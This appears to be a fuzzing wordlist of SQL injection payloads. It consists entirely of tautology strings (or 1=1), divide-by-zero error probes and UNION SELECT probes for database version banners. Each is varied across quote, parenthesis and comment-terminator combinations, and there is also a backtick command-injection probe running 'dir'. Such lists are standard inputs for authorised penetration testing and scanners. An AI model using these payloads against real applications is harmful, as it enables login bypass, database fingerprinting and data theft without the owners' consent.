 or 1=1
 or 1=1--
 or 1=1-- -
 or 1=1#
 or 1=1/*
 or 1=1;%00
 or 1=1;--
 or 1=1;-- -
 or 1=1;#
 or 1=1;/*
 and 1=1
 and 1=1--
 and 1=1-- -
 and 1=1#
 and 1=1/*
 and 1=1;%00
 and 1=1;--
 and 1=1;-- -
 and 1=1;#
 and 1=1;/*
 and 1/0=1
 and 1/0=1--
 and 1/0=1-- -
 and 1/0=1#
 and 1/0=1/*
 and 1/0=1;%00
 and 1/0=1;--
 and 1/0=1;-- -
 and 1/0=1;#
 and 1/0=1;/*
 union select @@version
 union select @@version--
 union select @@version-- -
 union select @@version#
 union select @@version/*
 union select @@version;%00
 union select @@version;--
 union select @@version;-- -
 union select @@version;#
 union select @@version;/*
 union select version()
 union select version()--
 union select version()-- -
 union select version()#
 union select version()/*
 union select version();%00
 union select version();--
 union select version();-- -
 union select version();#
 union select version();/*
 union select null
 union select null--
 union select null-- -
 union select null#
 union select null/*
 union select null;%00
 union select null;--
 union select null;-- -
 union select null;#
 union select null;/*
'or 1=1
'or 1=1--
'or 1=1-- -
'or 1=1#
'or 1=1/*
'or 1=1;%00
'or 1=1;--
'or 1=1;-- -
'or 1=1;#
'or 1=1;/*
'and 1=1
'and 1=1--
'and 1=1-- -
'and 1=1#
'and 1=1/*
'and 1=1;%00
'and 1=1;--
'and 1=1;-- -
'and 1=1;#
'and 1=1;/*
'and 1/0=1
'and 1/0=1--
'and 1/0=1-- -
'and 1/0=1#
'and 1/0=1/*
'and 1/0=1;%00
'and 1/0=1;--
'and 1/0=1;-- -
'and 1/0=1;#
'and 1/0=1;/*
'union select @@version
'union select @@version--
'union select @@version-- -
'union select @@version#
'union select @@version/*
'union select @@version;%00
'union select @@version;--
'union select @@version;-- -
'union select @@version;#
'union select @@version;/*
'union select version()
'union select version()--
'union select version()-- -
'union select version()#
'union select version()/*
'union select version();%00
'union select version();--
'union select version();-- -
'union select version();#
'union select version();/*
'union select null
'union select null--
'union select null-- -
'union select null#
'union select null/*
'union select null;%00
'union select null;--
'union select null;-- -
'union select null;#
'union select null;/*
 "or 1=1
 "or 1=1--
 "or 1=1-- -
 "or 1=1#
 "or 1=1/*
 "or 1=1;%00
 "or 1=1;--
 "or 1=1;-- -
 "or 1=1;#
 "or 1=1;/*
 "and 1=1
 "and 1=1--
 "and 1=1-- -
 "and 1=1#
 "and 1=1/*
 "and 1=1;%00
 "and 1=1;--
 "and 1=1;-- -
 "and 1=1;#
 "and 1=1;/*
 "and 1/0=1
 "and 1/0=1--
 "and 1/0=1-- -
 "and 1/0=1#
 "and 1/0=1/*
 "and 1/0=1;%00
 "and 1/0=1;--
 "and 1/0=1;-- -
 "and 1/0=1;#
 "and 1/0=1;/*
 "union select @@version
 "union select @@version--
 "union select @@version-- -
 "union select @@version#
 "union select @@version/*
 "union select @@version;%00
 "union select @@version;--
 "union select @@version;-- -
 "union select @@version;#
 "union select @@version;/*
 "union select version()
 "union select version()--
 "union select version()-- -
 "union select version()#
 "union select version()/*
 "union select version();%00
 "union select version();--
 "union select version();-- -
 "union select version();#
 "union select version();/*
 "union select null
 "union select null--
 "union select null-- -
 "union select null#
 "union select null/*
 "union select null;%00
 "union select null;--
 "union select null;-- -
 "union select null;#
 "union select null;/*
')or 1=1
')or 1=1--
')or 1=1-- -
')or 1=1#
')or 1=1/*
')or 1=1;%00
')or 1=1;--
')or 1=1;-- -
')or 1=1;#
')or 1=1;/*
')and 1=1
')and 1=1--
')and 1=1-- -
')and 1=1#
')and 1=1/*
')and 1=1;%00
')and 1=1;--
')and 1=1;-- -
')and 1=1;#
')and 1=1;/*
')and 1/0=1
')and 1/0=1--
')and 1/0=1-- -
')and 1/0=1#
')and 1/0=1/*
')and 1/0=1;%00
')and 1/0=1;--
')and 1/0=1;-- -
')and 1/0=1;#
')and 1/0=1;/*
')union select @@version
')union select @@version--
')union select @@version-- -
')union select @@version#
')union select @@version/*
')union select @@version;%00
')union select @@version;--
')union select @@version;-- -
')union select @@version;#
')union select @@version;/*
')union select version()
')union select version()--
')union select version()-- -
')union select version()#
')union select version()/*
')union select version();%00
')union select version();--
')union select version();-- -
')union select version();#
')union select version();/*
')union select null
')union select null--
')union select null-- -
')union select null#
')union select null/*
')union select null;%00
')union select null;--
')union select null;-- -
')union select null;#
')union select null;/*
';)or 1=1
';)or 1=1--
';)or 1=1-- -
';)or 1=1#
';)or 1=1/*
';)or 1=1;%00
';)or 1=1;--
';)or 1=1;-- -
';)or 1=1;#
';)or 1=1;/*
';)and 1=1
';)and 1=1--
';)and 1=1-- -
';)and 1=1#
';)and 1=1/*
';)and 1=1;%00
';)and 1=1;--
';)and 1=1;-- -
';)and 1=1;#
';)and 1=1;/*
';)and 1/0=1
';)and 1/0=1--
';)and 1/0=1-- -
';)and 1/0=1#
';)and 1/0=1/*
';)and 1/0=1;%00
';)and 1/0=1;--
';)and 1/0=1;-- -
';)and 1/0=1;#
';)and 1/0=1;/*
';)union select @@version
';)union select @@version--
';)union select @@version-- -
';)union select @@version#
';)union select @@version/*
';)union select @@version;%00
';)union select @@version;--
';)union select @@version;-- -
';)union select @@version;#
';)union select @@version;/*
';)union select version()
';)union select version()--
';)union select version()-- -
';)union select version()#
';)union select version()/*
';)union select version();%00
';)union select version();--
';)union select version();-- -
';)union select version();#
';)union select version();/*
';)union select null
';)union select null--
';)union select null-- -
';)union select null#
';)union select null/*
';)union select null;%00
';)union select null;--
';)union select null;-- -
';)union select null;#
';)union select null;/*
');or 1=1
');or 1=1--
');or 1=1-- -
');or 1=1#
');or 1=1/*
');or 1=1;%00
');or 1=1;--
');or 1=1;-- -
');or 1=1;#
');or 1=1;/*
');and 1=1
');and 1=1--
');and 1=1-- -
');and 1=1#
');and 1=1/*
');and 1=1;%00
');and 1=1;--
');and 1=1;-- -
');and 1=1;#
');and 1=1;/*
');and 1/0=1
');and 1/0=1--
');and 1/0=1-- -
');and 1/0=1#
');and 1/0=1/*
');and 1/0=1;%00
');and 1/0=1;--
');and 1/0=1;-- -
');and 1/0=1;#
');and 1/0=1;/*
');union select @@version
');union select @@version--
');union select @@version-- -
');union select @@version#
');union select @@version/*
');union select @@version;%00
');union select @@version;--
');union select @@version;-- -
');union select @@version;#
');union select @@version;/*
');union select version()
');union select version()--
');union select version()-- -
');union select version()#
');union select version()/*
');union select version();%00
');union select version();--
');union select version();-- -
');union select version();#
');union select version();/*
');union select null
');union select null--
');union select null-- -
');union select null#
');union select null/*
');union select null;%00
');union select null;--
');union select null;-- -
');union select null;#
');union select null;/*
")or 1=1
")or 1=1--
")or 1=1-- -
")or 1=1#
")or 1=1/*
")or 1=1;%00
")or 1=1;--
")or 1=1;-- -
")or 1=1;#
")or 1=1;/*
")and 1=1
")and 1=1--
")and 1=1-- -
")and 1=1#
")and 1=1/*
")and 1=1;%00
")and 1=1;--
")and 1=1;-- -
")and 1=1;#
")and 1=1;/*
")and 1/0=1
")and 1/0=1--
")and 1/0=1-- -
")and 1/0=1#
")and 1/0=1/*
")and 1/0=1;%00
")and 1/0=1;--
")and 1/0=1;-- -
")and 1/0=1;#
")and 1/0=1;/*
")union select @@version
")union select @@version--
")union select @@version-- -
")union select @@version#
")union select @@version/*
")union select @@version;%00
")union select @@version;--
")union select @@version;-- -
")union select @@version;#
")union select @@version;/*
")union select version()
")union select version()--
")union select version()-- -
")union select version()#
")union select version()/*
")union select version();%00
")union select version();--
")union select version();-- -
")union select version();#
")union select version();/*
")union select null
")union select null--
")union select null-- -
")union select null#
")union select null/*
")union select null;%00
")union select null;--
")union select null;-- -
")union select null;#
")union select null;/*
";)or 1=1
";)or 1=1--
";)or 1=1-- -
";)or 1=1#
";)or 1=1/*
";)or 1=1;%00
";)or 1=1;--
";)or 1=1;-- -
";)or 1=1;#
";)or 1=1;/*
";)and 1=1
";)and 1=1--
";)and 1=1-- -
";)and 1=1#
";)and 1=1/*
";)and 1=1;%00
";)and 1=1;--
";)and 1=1;-- -
";)and 1=1;#
";)and 1=1;/*
";)and 1/0=1
";)and 1/0=1--
";)and 1/0=1-- -
";)and 1/0=1#
";)and 1/0=1/*
";)and 1/0=1;%00
";)and 1/0=1;--
";)and 1/0=1;-- -
";)and 1/0=1;#
";)and 1/0=1;/*
";)union select @@version
";)union select @@version--
";)union select @@version-- -
";)union select @@version#
";)union select @@version/*
";)union select @@version;%00
";)union select @@version;--
";)union select @@version;-- -
";)union select @@version;#
";)union select @@version;/*
";)union select version()
";)union select version()--
";)union select version()-- -
";)union select version()#
";)union select version()/*
";)union select version();%00
";)union select version();--
";)union select version();-- -
";)union select version();#
";)union select version();/*
";)union select null
";)union select null--
";)union select null-- -
";)union select null#
";)union select null/*
";)union select null;%00
";)union select null;--
";)union select null;-- -
";)union select null;#
";)union select null;/*
");or 1=1
");or 1=1--
");or 1=1-- -
");or 1=1#
");or 1=1/*
");or 1=1;%00
");or 1=1;--
");or 1=1;-- -
");or 1=1;#
");or 1=1;/*
");and 1=1
");and 1=1--
");and 1=1-- -
");and 1=1#
");and 1=1/*
");and 1=1;%00
");and 1=1;--
");and 1=1;-- -
");and 1=1;#
");and 1=1;/*
");and 1/0=1
");and 1/0=1--
");and 1/0=1-- -
");and 1/0=1#
");and 1/0=1/*
");and 1/0=1;%00
");and 1/0=1;--
");and 1/0=1;-- -
");and 1/0=1;#
");and 1/0=1;/*
");union select @@version
");union select @@version--
");union select @@version-- -
");union select @@version#
");union select @@version/*
");union select @@version;%00
");union select @@version;--
");union select @@version;-- -
");union select @@version;#
");union select @@version;/*
");union select version()
");union select version()--
");union select version()-- -
");union select version()#
");union select version()/*
");union select version();%00
");union select version();--
");union select version();-- -
");union select version();#
");union select version();/*
");union select null
");union select null--
");union select null-- -
");union select null#
");union select null/*
");union select null;%00
");union select null;--
");union select null;-- -
");union select null;#
");union select null;/*
`
`dir`
` or 1=1 #
` or 1=1 --
` or 1=1 -- -
union select banner from v$version--
'union select banner from v$version--
"union select banner from v$version--
union select null from dual
'union select null from dual--
"union select null from dual--
union select banner from v$version
')union select banner from v$version--
';)union select banner from v$version--
');union select banner from v$version--
")union select banner from v$version--
";)union select banner from v$version--
");union select banner from v$version--
or '1'='1
')or '1'='1
';)or '1'='1
');or '1'='1
" or "1"="1
") or "1"="1
";) or "1"="1
"); or "1"="1
